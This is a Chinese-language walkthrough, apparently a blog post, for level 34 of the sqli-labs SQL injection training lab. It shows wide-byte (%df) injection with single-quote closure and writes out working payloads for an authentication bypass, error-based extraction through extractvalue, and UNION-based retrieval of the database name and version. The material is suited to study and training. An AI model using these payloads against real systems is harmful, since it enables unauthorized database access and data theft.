sqllab第三十四关通关笔记

知识点:

  • 宽字节注入+单引号闭合
  • 注意:不能直接在输入框进行宽字节注入,会被url编码,除非输入原始字符(%df已经是url编码了,直接输入会二次编码)
  • 错误注入
    • payload:username=1%df'or+extractvalue(1,concat(0x7e,database(),0x7e))=1--+
  • 联合注入
    • payload:username=1%df'union+select+database(),version()--+

通过抓包进行测试,发现是一个宽字节注入+单引号闭合

构造payload:username=1%df'or+1=1--+

成功显示出了id=1的用户信息

利用错误注入进行尝试

构造payload:username=1%df'or+exp(710)=1--+

界面成功回显了错误信息;说明可以进行错误注入

尝试读取数据库名

构造payload:username=1%df'or+extractvalue(1,concat(0x7e,database(),0x7e))=1--+

成功获取了数据库名;同样的可以获取数据库的其他信息

尝试进行联合注入

构造payload:username=1%df'union+select+1,2--+

输入内容成功显示到了屏幕上

利用联合注入获取数据库名和版本信息

构造payload:username=1%df'union+select+database(),version()--+

成功获取了数据库名和版本信息,同样手段可以获取数据库其他内容

10

相关推荐
β添砖java8 小时前
2025最新快速构建企业级虚拟专用网络环境学习笔记
笔记·学习
qianpeng48 小时前
IDA PRO笔记
笔记
Yang_jie_0312 小时前
笔记:数据结构(顺序表)
数据结构·windows·笔记
Tom@敲代码15 小时前
js学习笔记-01
javascript·笔记·学习
巴巴媛66616 小时前
STM32学习笔记【32.BKP + RTC】
笔记·stm32·学习
能摆一天是一天17 小时前
Spring ai vectorstore 使用本地模型导致只能匹配可行度为1.0的内容的解决方法笔记
java·笔记·spring
进阶的DW17 小时前
Wiki + Graph + RAG 知识库建设笔记2
笔记
AOwhisky17 小时前
Linux(CentOS)系统管理入门笔记(第四期)——文件系统(下篇):文件与目录操作实战——cpmvmkdirrmln
linux·运维·笔记·centos·云计算·文件系统
bmy-happy18 小时前
网安专业课程笔记sale
笔记
浩瀚地学18 小时前
【Java基础复习】IO流(二)
java·开发语言·经验分享·笔记·学习